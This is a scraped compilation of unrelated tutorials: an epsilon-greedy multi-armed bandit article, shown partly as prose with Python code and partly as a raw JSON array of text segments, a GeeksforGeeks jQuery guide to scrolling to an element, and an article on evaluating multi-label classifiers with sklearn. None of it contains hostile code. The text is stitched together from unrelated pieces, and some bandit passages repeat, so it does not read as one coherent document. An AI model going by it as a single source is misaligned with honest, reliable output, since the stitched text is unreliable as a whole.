Q(a) = (r_1 + r_2 + … + r_k) / k,

where k is the counter for how many times action a (bandit) was chosen in the past, and r_i are the stochastic rewards for each time that bandit was chosen. With some extra arithmetic manipulation, this definition can be re-written recursively as

Q_k(a) = Q_{k-1}(a) + (1/k) * (r_k − Q_{k-1}(a)).

As we do not start off knowing the “true” values of Q(a), we can use this recursive definition as an iterative tool for approximating Q(a) at the end of every episode.
To pair up the epsilon-greedy agent with our action-value Q(a) estimates, we let the agent choose a bandit at random with probability epsilon, and let it greedily choose an action from our Q(a) estimates the rest of the time. With these two concepts down, we can now go about solving the multi-armed bandit problem!
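For a concrete picture of how the pieces fit together, below is a minimal epsilon-greedy sketch in Python. It is a simplified stand-in for the repository linked above, not the repository code itself; the bandit probabilities and the epsilon/episode settings simply mirror the values quoted in this article.

import numpy as np

# True success probabilities (hidden from the agent) for the 10 bandits above
probs = [0.10, 0.50, 0.60, 0.80, 0.10, 0.25, 0.60, 0.45, 0.75, 0.65]

def run_experiment(probs, n_episodes=10000, eps=0.10, seed=0):
    rng = np.random.default_rng(seed)
    n = len(probs)
    Q = np.zeros(n)              # running reward-average estimate per bandit
    pulls = np.zeros(n)          # how many times each bandit was chosen
    actions = np.empty(n_episodes, dtype=int)
    for ep in range(n_episodes):
        # Epsilon-greedy: explore with probability eps, otherwise act greedily on Q
        if rng.random() < eps:
            a = int(rng.integers(n))
        else:
            a = int(np.argmax(Q))
        r = float(rng.random() < probs[a])   # stochastic reward: 1 on success, 0 on failure
        pulls[a] += 1
        Q[a] += (r - Q[a]) / pulls[a]        # incremental reward-average update of Q(a)
        actions[ep] = a
    return Q, actions

Q, actions = run_experiment(probs)
print("Estimated Q(a):", np.round(Q, 2))
print("Share of pulls on Bandit #4 in the last 1,000 episodes:",
      float(np.mean(actions[-1000:] == 3)))

Averaged over many such runs, the greedy choice concentrates on Bandit #4 while roughly an epsilon-sized share of pulls stays spread over the rest, which is the plateau described above.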
[ { "code": null, "e": 605, "s": 172, "text": "The multi-armed bandit problem is a classic reinforcement learning example where we are given a slot machine with n arms (bandits) with each arm having its own rigged probability distribution of success. Pulling any one of the arms gives you a stochastic reward of either R=+1 for success, or R=0 for failure. Our objective is to pull the arms one-by-one in sequence such that we maximize our total reward collected in the long run." }, { "code": null, "e": 856, "s": 605, "text": "The non-triviality of the multi-armed bandit problem lies in the fact that we (the agent) cannot access the true bandit probability distributions — all learning is carried out via the means of trial-and-error and value estimation. So the question is:" }, { "code": null, "e": 937, "s": 856, "text": "How can we design a systematic strategy that adapts to these stochastic rewards?" }, { "code": null, "e": 1221, "s": 937, "text": "This is our goal for the multi-armed bandit problem, and having such a strategy would prove very useful in many real-world situations where one would like to select the “best” bandit out of a group of bandits i.e. A/B testing, line-up optimization, evaluating social media influence." }, { "code": null, "e": 1640, "s": 1221, "text": "In this article, we approach the multi-armed bandit problem with a classical reinforcement learning technique of an epsilon-greedy agent with a learning framework of reward-average sampling to compute the action-value Q(a) to help the agent improve its future action decisions for long-term reward maximization. The Python code implementation of this multi-armed bandit algorithm solution can be found at my Github at:" }, { "code": null, "e": 1722, "s": 1640, "text": "https://github.com/ankonzoid/LearningX/tree/master/classical_RL/multiarmed_bandit" }, { "code": null, "e": 1989, "s": 1722, "text": "Please refer to our Appendix for more details about the epsilon-greedy agent, and how the reward-average sampling method is used to iteratively update Q(a). In the next section, we explain the results of deploying such an agent in the multi-armed bandit environment." }, { "code": null, "e": 2119, "s": 1989, "text": "More of my blogs, tutorials, and projects on Deep Learning and Reinforcement Learning can be found at my Medium and at my Github." }, { "code": null, "e": 2347, "s": 2119, "text": "Consider our Python code example of 10 hard-coded bandits each with their own individual success probabilities (remember that our agent is blind to these numbers, it can only realize them via sampling the bandits individually):" }, { "code": null, "e": 2658, "s": 2347, "text": "Bandit #1 = 10% success rateBandit #2 = 50% success rateBandit #3 = 60% success rateBandit #4 = 80% success rate (best)Bandit #5 = 10% success rateBandit #6 = 25% success rateBandit #7 = 60% success rateBandit #8 = 45% success rateBandit #9 = 75% success rate (2nd best)Bandit #10 = 65% success rate (3rd best)" }, { "code": null, "e": 2842, "s": 2658, "text": "By inspection, we will be expecting our the agent in the long-term to pick out Bandit #4 as the strongest signal, with Bandit #9 following second, and Bandit #10 following third, etc." }, { "code": null, "e": 3140, "s": 2842, "text": "Now to the results. We performed 2,000 experiments for the agent to start from scratch with epsilon exploration probability of 10%, and trained the agent for 10,000 episodes per experiment. 
The average proportion of bandits chosen by the agent as a function of episode number is depicted in Fig 1." }, { "code": null, "e": 3929, "s": 3140, "text": "In Fig 1, we can see that that the selection choice of bandits is uniformly distributed at ~10% amongst all bandits near the beginning of training (< 10 episodes) as it is in its exploratory phase of not knowing which bandits to take advantage of yet. It is until we reach later episodes (> 100 episodes) do we see a clear greedy mechanism take precedence in deciding which bandits should get more priority because of the rewards sampled so far. As expected Bandits #4, #9, #10 at this mid-to-late training phase are the ones that get chosen by the agent. Lastly and almost inevitably, the agent tends to almost always choose Bandit #4 as the “best” bandit at the end of training with a plateau of ~90% (since ~10% should always remain because of the fixed epsilon exploration parameter)." }, { "code": null, "e": 5011, "s": 3929, "text": "Although the optimal policy is to select Bandit #4 in this problem, you will notice that this does not mean that pulling Bandit #4 will always beat any other bandit on a given pull since the rewards are stochastic; it is in the long-term reward average that you will find Bandit #4 to dominate. Also, there is nothing particularly special about using our agent to approach this problem— it is just one of many methods that can adaptively maximize the collection of long-term rewards. There definitely exists situations where a completely exploratory (epsilon = 100%), or a completely greedy agent (epsilon = 0%), or anything in between, could end up collecting more rewards for a finite number of episodes than our epsilon=10%-greedy agent. The main appeal of deploying such an agent in my perspective is for the automation of minimizing re-choosing bandits that have already shown some evidence of failure. From a business and practical perspective, this can save a lot of time and resources that would be otherwise wasted in the optimization process of finding the “best” bandit." }, { "code": null, "e": 5724, "s": 5011, "text": "In a nutshell, the epsilon-greedy agent is a hybrid of a (1) completely-exploratory agent and a (2) completely-greedy agent. In the multi-armed bandit problem, a completely-exploratory agent will sample all the bandits at a uniform rate and acquire knowledge about every bandit over time; the caveat of such an agent is that this knowledge is never utilized to help itself to make better future decisions! On the other extreme, a completely-greedy agent will choose a bandit and stick with its choice for the rest of eternity; it will not make an effort to try out other bandits in the system to see whether they have better success rates to help it maximize its long-term rewards, thus it is very narrow-minded!" }, { "code": null, "e": 6245, "s": 5724, "text": "To get a somewhat desirable agent that possesses the best of both worlds, the epsilon-greedy agent is designed to give an epsilon chance (say for example 10%) towards exploring bandits randomly at any state, and acts greedily on its current ‘best’ bandit value estimate for all other times. The intuition surrounding this is that the greedy-mechanism can help the agent focus on its currently most “successful” bandits, and the exploratory-mechanism gives the agent to explore for better bandits that might be out there." 
}, { "code": null, "e": 6739, "s": 6245, "text": "The only thing left is: how do we define a notion of “value” of a bandit to the agent so that it can choose greedily? Borrowing from reinforcement learning, we can define the action-value function Q(s, a) to represent the expected long-term reward of taking action a from state s. In our case of the multi-armed bandit, each action brings the agent to a terminal state so long-term rewards are exactly the immediate rewards and we simplify the notation of the definition of the action-value as" }, { "code": null, "e": 6984, "s": 6739, "text": "where k is the counter for how many times action a (bandit) was chosen in the past, and r are the stochastic rewards for each time that bandit was chosen. With some extra arithmetic manipulation, this definition can be re-written recursively as" }, { "code": null, "e": 7157, "s": 6984, "text": "As we do not know start off knowing the “true” values of Q(a), we can use this recursive definition as an iterative tool for approximating Q(a) at the end of every episode." }, { "code": null, "e": 7421, "s": 7157, "text": "To pair up the epsilon-greedy agent with our action-values Q(a) estimates, we let the epsilon-greedy agent choose a bandit at random epsilon-probability of the time, and let the agent use greedily choose an action from our Q(a) estimates for the rest of the times" } ]
How to scroll to specific element using jQuery ? - GeeksforGeeks
03 Aug, 2021 Many times, in our website we want to scroll automatically to a section of the webpage when we click on a button or a heading in a navbar or a list. So, to achieve this automatic scrolling to the required element, we need to take the help of jQuery. Using jQuery, we can achieve this in a very simple way. But first we need to understand two methods namely scrollTop() and offSet() in jQuery. scrollTop() method: It helps to get the current vertical position of the scrollbar of the first element, in the set of all matched elements. scrollTop() method: It is used to set the vertical position of the scroll bar to the value ‘val’. offSet() Method: It is used to get the coordinates of the first element in the set of all matched elements. Example 1: This example describes how to scroll a specific element using jQuery. <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content= "width=device-width, initial-scale=1.0"> <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"> </script> <title> How to scroll to specific item using jQuery? </title> <style> div { color: #0f9d58; border: 3px solid #0f9d58; width: 200px; height: 100px; overflow: auto; } p { width: 300px; height: 300px; } </style></head> <body> <div class="demo"> <h1>Heading</h1> <p>paragraph</p> </div> <script> var container = $('div'); var scrollTo = $('p'); // Calculating new position of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Setting the value of scrollbar container.scrollTop(position); </script></body> </html> Output: Example 2: In this example, we will see how to scroll to different sections of the page by clicking different buttons, along with a scrolling effect. <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content= "width=device-width, initial-scale=1.0"> <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"> </script> <title> How to scroll to specific item using jQuery? </title> <style> div { color: #0f9d58; border: 3px solid #0f9d58; margin: 10px; width: 200px; height: 100px; overflow: auto; } p { width: 300px; height: 300px; } button { margin: 10px; } </style></head> <body> <div class="demo"> <h1>Heading</h1> <p id="p1">paragraph 1</p> <p id="p2">paragraph 2</p> </div> <button onclick="scrollParagraph1()"> paragraph 1 </button> <button onclick="scrollParagraph2()"> paragraph 2 </button> <script> var container = $('div'); // Scrolls to paragraph 1 function scrollParagraph1() { var scrollTo = $("#p1"); // Calculating new position // of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Animating scrolling effect container.animate({ scrollTop: position }); } // Scrolls to paragraph 2 function scrollParagraph2() { var scrollTo = $("#p2"); // Calculating new position // of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Animating scrolling effect container.animate({ scrollTop: position }); } </script></body> </html> Output: When the second button is clicked, the output is as follows. 
jQuery is an open source JavaScript library that simplifies interactions with an HTML/CSS document. It is widely famous for its philosophy of "Write less, do more". You can learn jQuery from the ground up by following this jQuery Tutorial and jQuery Examples.
[ { "code": null, "e": 24790, "s": 24762, "text": "\n03 Aug, 2021" }, { "code": null, "e": 25183, "s": 24790, "text": "Many times, in our website we want to scroll automatically to a section of the webpage when we click on a button or a heading in a navbar or a list. So, to achieve this automatic scrolling to the required element, we need to take the help of jQuery. Using jQuery, we can achieve this in a very simple way. But first we need to understand two methods namely scrollTop() and offSet() in jQuery." }, { "code": null, "e": 25324, "s": 25183, "text": "scrollTop() method: It helps to get the current vertical position of the scrollbar of the first element, in the set of all matched elements." }, { "code": null, "e": 25422, "s": 25324, "text": "scrollTop() method: It is used to set the vertical position of the scroll bar to the value ‘val’." }, { "code": null, "e": 25530, "s": 25422, "text": "offSet() Method: It is used to get the coordinates of the first element in the set of all matched elements." }, { "code": null, "e": 25611, "s": 25530, "text": "Example 1: This example describes how to scroll a specific element using jQuery." }, { "code": "<!DOCTYPE html><html lang=\"en\"> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content= \"width=device-width, initial-scale=1.0\"> <script src=\"https://code.jquery.com/jquery-3.5.1.min.js\" integrity=\"sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=\" crossorigin=\"anonymous\"> </script> <title> How to scroll to specific item using jQuery? </title> <style> div { color: #0f9d58; border: 3px solid #0f9d58; width: 200px; height: 100px; overflow: auto; } p { width: 300px; height: 300px; } </style></head> <body> <div class=\"demo\"> <h1>Heading</h1> <p>paragraph</p> </div> <script> var container = $('div'); var scrollTo = $('p'); // Calculating new position of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Setting the value of scrollbar container.scrollTop(position); </script></body> </html>", "e": 26752, "s": 25611, "text": null }, { "code": null, "e": 26760, "s": 26752, "text": "Output:" }, { "code": null, "e": 26910, "s": 26760, "text": "Example 2: In this example, we will see how to scroll to different sections of the page by clicking different buttons, along with a scrolling effect." }, { "code": "<!DOCTYPE html><html lang=\"en\"> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content= \"width=device-width, initial-scale=1.0\"> <script src=\"https://code.jquery.com/jquery-3.5.1.min.js\" integrity=\"sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=\" crossorigin=\"anonymous\"> </script> <title> How to scroll to specific item using jQuery? 
</title> <style> div { color: #0f9d58; border: 3px solid #0f9d58; margin: 10px; width: 200px; height: 100px; overflow: auto; } p { width: 300px; height: 300px; } button { margin: 10px; } </style></head> <body> <div class=\"demo\"> <h1>Heading</h1> <p id=\"p1\">paragraph 1</p> <p id=\"p2\">paragraph 2</p> </div> <button onclick=\"scrollParagraph1()\"> paragraph 1 </button> <button onclick=\"scrollParagraph2()\"> paragraph 2 </button> <script> var container = $('div'); // Scrolls to paragraph 1 function scrollParagraph1() { var scrollTo = $(\"#p1\"); // Calculating new position // of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Animating scrolling effect container.animate({ scrollTop: position }); } // Scrolls to paragraph 2 function scrollParagraph2() { var scrollTo = $(\"#p2\"); // Calculating new position // of scrollbar var position = scrollTo.offset().top - container.offset().top + container.scrollTop(); // Animating scrolling effect container.animate({ scrollTop: position }); } </script></body> </html>", "e": 28910, "s": 26910, "text": null }, { "code": null, "e": 28918, "s": 28910, "text": "Output:" }, { "code": null, "e": 28979, "s": 28918, "text": "When the second button is clicked, the output is as follows." }, { "code": null, "e": 29247, "s": 28979, "text": "jQuery is an open source JavaScript library that simplifies the interactions between an HTML/CSS document, It is widely famous with it’s philosophy of “Write less, do more”.You can learn jQuery from the ground up by following this jQuery Tutorial and jQuery Examples." }, { "code": null, "e": 29384, "s": 29247, "text": "Attention reader! Don’t stop learning now. Get hold of all the important HTML concepts with the Web Design for Beginners | HTML course." }, { "code": null, "e": 29393, "s": 29384, "text": "CSS-Misc" }, { "code": null, "e": 29403, "s": 29393, "text": "HTML-Misc" }, { "code": null, "e": 29415, "s": 29403, "text": "jQuery-Misc" }, { "code": null, "e": 29422, "s": 29415, "text": "Picked" }, { "code": null, "e": 29426, "s": 29422, "text": "CSS" }, { "code": null, "e": 29431, "s": 29426, "text": "HTML" }, { "code": null, "e": 29438, "s": 29431, "text": "JQuery" }, { "code": null, "e": 29455, "s": 29438, "text": "Web Technologies" }, { "code": null, "e": 29460, "s": 29455, "text": "HTML" }, { "code": null, "e": 29558, "s": 29460, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 29567, "s": 29558, "text": "Comments" }, { "code": null, "e": 29580, "s": 29567, "text": "Old Comments" }, { "code": null, "e": 29619, "s": 29580, "text": "Build a Survey Form using HTML and CSS" }, { "code": null, "e": 29641, "s": 29619, "text": "CSS | Text Formatting" }, { "code": null, "e": 29697, "s": 29641, "text": "How to align content of a div to the bottom using CSS ?" }, { "code": null, "e": 29731, "s": 29697, "text": "Primer CSS Flexbox Flex Direction" }, { "code": null, "e": 29774, "s": 29731, "text": "Difference between em and rem units in CSS" }, { "code": null, "e": 29824, "s": 29774, "text": "How to Insert Form Data into Database using PHP ?" }, { "code": null, "e": 29866, "s": 29824, "text": "Form validation using HTML and JavaScript" }, { "code": null, "e": 29927, "s": 29866, "text": "How to set input type date in dd-mm-yyyy format using HTML ?" } ]
Evaluating Multi-label Classifiers | by Aniruddha Karajgi | Towards Data Science
Classification is an important application of machine learning. It is a predictive modelling task that entails assigning a class label to a data point, meaning that that particular datapoint belongs to the assigned class. - Accuracy- The Confusion Matrix- A multi-label classification example- Multilabel classification confusion matrix- Aggregate metrics- Some Common Scenarios Developing and applying models is one thing, but without a way to evaluate them, experimentation quickly becomes pointless. Most people know what accuracy is, even if it's just in an intuitive sense — how accurate something is, refers to how often it achieves some goal. That goal could be how often a soccer player’s shots are on target, or how accurate tomorrow’s weather was predicted. When it comes to classification, it's measured by how often a model correctly classifies data. Simply put, for a classification problem, accuracy can be measured as: accuracy = number of correct predictions / total predictions This seems like a good way to evaluate a model — you’d expect a “better” model to be more accurate than some “less good” model. And while that’s generally true, accuracy sometimes fails to give you the entire picture, like imbalanced datasets, for example. Let’s say you have data belonging to two classes: red and blue. Class red has the majority of data points. Let’s say that their proportion is 9:1. That would mean that given 100 data points, 90 would belong to class red, while only 10 would belong to class blue. Now, what if my model is so poorly trained that it always predicts class red, no matter what datapoint it's given? You can probably see where I’m going with this. In the above case, my model’s accuracy would end up being 90%. It would get all reds correct, and all blues wrong. So, accuracy would be 90 / (90 + 10) or 90%. Objectively speaking, this would be a pretty decent classification accuracy to aim for. But accuracy, in this case, hides the fact that our model has, in fact, learned nothing at all and always predicts class red. A confusion matrix is a matrix that breaks down correctly and incorrectly classified into: True positive (TP): Correctly predicting the positive class True Negative (TN): Correctly predicting the negative class False Positive (FP): Incorrectly predicting the positive class False Negative (FN): Incorrectly predicting the negative class Using these, metrics like precision, recall and f1-score are defined, which, compared to accuracy, give us a more accurate (hah!) measure of what’s going on. Coming back to our example, our negative class is class red and the positive class is blue. Let’s say we test our model on 100 data points. Maintaining the same distribution, 90 of the data points would be red, while 10 would be blue. Its confusion matrix would be: True positive = 0True negative = 90False positive = 10False Negative = 0 Computing Precision, recall and F1-score Precision = TP / (TP + FP) = 0 / (0 + 10) = 0Recall = TP / (TP + FN) = 0 / (0 + 0) = NaN So though my model’s accuracy was 90%, a generally good score, its precision is 0 and recall is NaN, showing that the model didn’t predict the positive class even a single time. This is a good example of where accuracy doesn’t give us the entire picture. The same is true for precision and recall individually. Multilabel classification refers to the case where a data point can be assigned to more than one class, and there are many classes available. 
This is not the same as multi-class classification, which is where each data point can only be assigned to one class, irrespective of the actual number of possible classes. Unlike in multi-class classification, in multilabel classification, the classes aren’t mutually exclusive Evaluating a binary classifier using metrics like precision, recall and f1-score is pretty straightforward, so I won’t be discussing that. Doing the same for multi-label classification isn’t exactly too difficult either— just a little more involved. To make it easier, let’s walk through a simple example, which we’ll tweak as we go along. Let’s say we have data spread across three classes — class A, class B and class C. Our model attempts to classify data points into these classes. This is a multi-label classification problem, so these classes aren’t exclusive. Let’s take 3 data points as our test set to simply things. expected predictedA, C A, BC CA, B, C B, C We’ll first see what a confusion matrix looks like for a multilabel problem and then create a separate one for one of the classes as an example. We’ll encode the classes A, B and C using sklearn’s MultiLabelBinarizer. So every prediction can be expressed as a three-bit string, where the first bit represents A, then B and the last bit is C. expected predicted1 0 1 1 1 00 0 1 0 0 11 1 1 0 1 1 Based on a question from a reader, I want to clarify that transformations like binarizers and scalers are supposed to be fit on your training set only. Of course, you want to apply these same transformations during inference, but they aren’t supposed to be fit to the new data. The above list of expected and predicted labels is just to visually understand how they are different. train, test <- datatransformed_train <- fit + transformtransformed_test <- transform (using the same scaler/binarizer) Let’s find the confusion matrix for class A based on our test. For calculating true positive, we’re looking at the cases where our model predicted the label A and the expected labels also contained A. So TP would be equal to 1. Coming to FP, we are looking for those cases where our model predicted the label A but A isn’t in the true label. So FP is 0. Coming to TN, this is where neither the expected labels nor the predicted labels contain class A. So TN is 1. Finally, FN is where the A is an expected label, but it wasn’t predicted by our model. So FN is 1. Let’s make the confusion matrix for class A using these values: TN FPFN TP We get: A similar computation can be done for the other two classes. Class B: 1 1 0 1Class C: 0 0 1 2 Confusion matrices like the ones we just calculated can be generated using sklearn’s multilabel_confusion_matrix. We simply pass in the expected and predicted labels (after binarizing them)and get the first element from the list of confusion matrices — one for each class. confusion_matrix_A = multilabel_confusion_matrix(y_expected, y_pred)[0] The output is consistent with our calculations. print(confusion_matrix_A)# prints:1 01 1 Using the confusion matrices we just computed, let’s calculate each metric for class A as an example. Precision for class A Precision is simply: Precision = TP / (TP + FP) In the case of class A, that ends up being: 1 / (1 + 0) = 1 Recall for class A Using the formula for recall given as: Recall = TP / (TP + FN) we get: 1 / (1 + 1) = 0.5 F1-score for class A This is just the harmonic mean of the precision and recall we calculated. which gives us: These metrics can be calculated for classes B and C in the same way. 
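As a compact companion to the hand calculation, here is a small Python sketch that reproduces the per-class confusion matrices and metrics for all three classes with sklearn on the same three test points; the variable names are illustrative rather than taken from the article's code.

from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.metrics import multilabel_confusion_matrix, classification_report

# The three test points used in this example
expected = [["A", "C"], ["C"], ["A", "B", "C"]]
predicted = [["A", "B"], ["C"], ["B", "C"]]

# Binarize the label sets into three-bit rows (A, B, C)
mlb = MultiLabelBinarizer(classes=["A", "B", "C"])
y_expected = mlb.fit_transform(expected)
y_pred = mlb.transform(predicted)

# One 2x2 matrix per class, laid out as [[TN, FP], [FN, TP]]
print(multilabel_confusion_matrix(y_expected, y_pred))

# Per-class precision/recall/F1 plus the micro/macro/weighted/samples averages
print(classification_report(
    y_expected, y_pred,
    target_names=["class A", "class B", "class C"]))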
On finishing it for all the other classes, we end up with the following results:

Class B
Precision = 0.5
Recall = 1.0
F1-score = 0.667

Class C
Precision = 1.0
Recall = 0.667
F1-score = 0.8

Aggregate metrics like macro, micro, weighted and samples avg give us a high-level view of how our model is performing.

Macro average
This is simply the average of a metric — precision, recall or f1-score — over all classes. So in our case, the macro-average for precision would be

Precision (macro avg) = (Precision of A + Precision of B + Precision of C) / 3 = 0.833

Micro average
The micro-average of a metric is calculated by considering all the TP, TN, FP and FN for each class, adding them up and then using those to compute the metric's micro-average. For example, micro-precision would be:

micro avg (precision) = sum(TP) / (sum(TP) + sum(FP))

For our example, using the per-class confusion matrices above, we end up getting:

micro avg (precision) = (1 + 1 + 2) / ((1 + 1 + 2) + (0 + 1 + 0)) = 0.8

Weighted average
This is simply the average of the metric values for individual classes, weighted by the support of that class.

Samples average
Here, we compute metrics for each sample and then average them. In our example, we have three samples.

expected     predicted
A, C         A, B
C            C
A, B, C      B, C

For sample #1, A and B were predicted, but the expected classes were A and C. So the precision for this sample would be 1 / 2, since out of the two predicted labels, only one was correct. For sample #2, C was predicted, and C was expected. So precision would be 1 for this sample — all predicted labels were expected. For sample #3, B and C were predicted, but all three labels were expected. Since all predicted labels were expected, precision would be 1. Note that though A wasn't predicted, the missing label won't hurt precision, it'll hurt recall. Averaging this, we get our samples average for precision.

(1/2 + 1 + 1) / 3 = 5/6 = 0.833

These aggregates can be computed for recall and f1-score as well.

Putting all this together, we end up with our classification report. Our computed values match those generated by sklearn. We'll use sklearn's metrics.classification_report function.

classification_report(
    y_expected,
    y_pred,
    output_dict=False,
    target_names=['class A', 'class B', 'class C'])

These are some scenarios that are likely to occur when evaluating multi-label classifiers.

Real-world test data can have duplicates. If you don't remove them, how would they affect the performance of your model? The aggregate metrics generally used when evaluating classification models are forms of average. So the effect of duplicates comes down to whether these duplicated data points are correctly classified or not.

When your model doesn't predict every expected label but also doesn't predict extra labels, you'll see higher precision values along with lower recall values. Whatever your model predicts, it's doing it correctly (high precision), but it's not always predicting what's expected (low recall).

This is the opposite of the previous scenario. Since your model is predicting extra labels, those extra classes would end up with lower precision (since those predictions aren't expected). At the same time, your model is predicting all the expected labels too, so you'd end up with high recall scores.

This is the ideal scenario, where both precision and recall are high. Intuitively, this means that when our model predicts a particular label, that's most often an expected label, and when a particular label is expected, our model generally gets it right.

This means that our model is really selective in its predictions.
You can avoid this by finding out which metrics are the most relevant to your use case, and then actually understanding how these are computed and what they mean. Hopefully, this article gave you an idea of how multi-label classifiers are evaluated. Thanks for reading! 22/21/12 fixed issue in recall formula 2/11/21 wording improvements add example code 15/4/22 note on transforming data
[ { "code": null, "e": 393, "s": 171, "text": "Classification is an important application of machine learning. It is a predictive modelling task that entails assigning a class label to a data point, meaning that that particular datapoint belongs to the assigned class." }, { "code": null, "e": 550, "s": 393, "text": "- Accuracy- The Confusion Matrix- A multi-label classification example- Multilabel classification confusion matrix- Aggregate metrics- Some Common Scenarios" }, { "code": null, "e": 674, "s": 550, "text": "Developing and applying models is one thing, but without a way to evaluate them, experimentation quickly becomes pointless." }, { "code": null, "e": 939, "s": 674, "text": "Most people know what accuracy is, even if it's just in an intuitive sense — how accurate something is, refers to how often it achieves some goal. That goal could be how often a soccer player’s shots are on target, or how accurate tomorrow’s weather was predicted." }, { "code": null, "e": 1034, "s": 939, "text": "When it comes to classification, it's measured by how often a model correctly classifies data." }, { "code": null, "e": 1105, "s": 1034, "text": "Simply put, for a classification problem, accuracy can be measured as:" }, { "code": null, "e": 1166, "s": 1105, "text": "accuracy = number of correct predictions / total predictions" }, { "code": null, "e": 1423, "s": 1166, "text": "This seems like a good way to evaluate a model — you’d expect a “better” model to be more accurate than some “less good” model. And while that’s generally true, accuracy sometimes fails to give you the entire picture, like imbalanced datasets, for example." }, { "code": null, "e": 1570, "s": 1423, "text": "Let’s say you have data belonging to two classes: red and blue. Class red has the majority of data points. Let’s say that their proportion is 9:1." }, { "code": null, "e": 1686, "s": 1570, "text": "That would mean that given 100 data points, 90 would belong to class red, while only 10 would belong to class blue." }, { "code": null, "e": 1801, "s": 1686, "text": "Now, what if my model is so poorly trained that it always predicts class red, no matter what datapoint it's given?" }, { "code": null, "e": 1849, "s": 1801, "text": "You can probably see where I’m going with this." }, { "code": null, "e": 2009, "s": 1849, "text": "In the above case, my model’s accuracy would end up being 90%. It would get all reds correct, and all blues wrong. So, accuracy would be 90 / (90 + 10) or 90%." }, { "code": null, "e": 2223, "s": 2009, "text": "Objectively speaking, this would be a pretty decent classification accuracy to aim for. But accuracy, in this case, hides the fact that our model has, in fact, learned nothing at all and always predicts class red." }, { "code": null, "e": 2314, "s": 2223, "text": "A confusion matrix is a matrix that breaks down correctly and incorrectly classified into:" }, { "code": null, "e": 2374, "s": 2314, "text": "True positive (TP): Correctly predicting the positive class" }, { "code": null, "e": 2434, "s": 2374, "text": "True Negative (TN): Correctly predicting the negative class" }, { "code": null, "e": 2497, "s": 2434, "text": "False Positive (FP): Incorrectly predicting the positive class" }, { "code": null, "e": 2560, "s": 2497, "text": "False Negative (FN): Incorrectly predicting the negative class" }, { "code": null, "e": 2718, "s": 2560, "text": "Using these, metrics like precision, recall and f1-score are defined, which, compared to accuracy, give us a more accurate (hah!) 
measure of what’s going on." }, { "code": null, "e": 2953, "s": 2718, "text": "Coming back to our example, our negative class is class red and the positive class is blue. Let’s say we test our model on 100 data points. Maintaining the same distribution, 90 of the data points would be red, while 10 would be blue." }, { "code": null, "e": 2984, "s": 2953, "text": "Its confusion matrix would be:" }, { "code": null, "e": 3063, "s": 2984, "text": "True positive = 0True negative = 90False positive = 10False Negative = 0" }, { "code": null, "e": 3104, "s": 3063, "text": "Computing Precision, recall and F1-score" }, { "code": null, "e": 3232, "s": 3104, "text": "Precision = TP / (TP + FP) = 0 / (0 + 10) = 0Recall = TP / (TP + FN) = 0 / (0 + 0) = NaN" }, { "code": null, "e": 3410, "s": 3232, "text": "So though my model’s accuracy was 90%, a generally good score, its precision is 0 and recall is NaN, showing that the model didn’t predict the positive class even a single time." }, { "code": null, "e": 3543, "s": 3410, "text": "This is a good example of where accuracy doesn’t give us the entire picture. The same is true for precision and recall individually." }, { "code": null, "e": 3685, "s": 3543, "text": "Multilabel classification refers to the case where a data point can be assigned to more than one class, and there are many classes available." }, { "code": null, "e": 3858, "s": 3685, "text": "This is not the same as multi-class classification, which is where each data point can only be assigned to one class, irrespective of the actual number of possible classes." }, { "code": null, "e": 3964, "s": 3858, "text": "Unlike in multi-class classification, in multilabel classification, the classes aren’t mutually exclusive" }, { "code": null, "e": 4214, "s": 3964, "text": "Evaluating a binary classifier using metrics like precision, recall and f1-score is pretty straightforward, so I won’t be discussing that. Doing the same for multi-label classification isn’t exactly too difficult either— just a little more involved." }, { "code": null, "e": 4304, "s": 4214, "text": "To make it easier, let’s walk through a simple example, which we’ll tweak as we go along." }, { "code": null, "e": 4531, "s": 4304, "text": "Let’s say we have data spread across three classes — class A, class B and class C. Our model attempts to classify data points into these classes. This is a multi-label classification problem, so these classes aren’t exclusive." }, { "code": null, "e": 4590, "s": 4531, "text": "Let’s take 3 data points as our test set to simply things." }, { "code": null, "e": 4656, "s": 4590, "text": "expected predictedA, C A, BC CA, B, C B, C" }, { "code": null, "e": 4801, "s": 4656, "text": "We’ll first see what a confusion matrix looks like for a multilabel problem and then create a separate one for one of the classes as an example." }, { "code": null, "e": 4998, "s": 4801, "text": "We’ll encode the classes A, B and C using sklearn’s MultiLabelBinarizer. So every prediction can be expressed as a three-bit string, where the first bit represents A, then B and the last bit is C." }, { "code": null, "e": 5071, "s": 4998, "text": "expected predicted1 0 1 1 1 00 0 1 0 0 11 1 1 0 1 1" }, { "code": null, "e": 5349, "s": 5071, "text": "Based on a question from a reader, I want to clarify that transformations like binarizers and scalers are supposed to be fit on your training set only. Of course, you want to apply these same transformations during inference, but they aren’t supposed to be fit to the new data." 
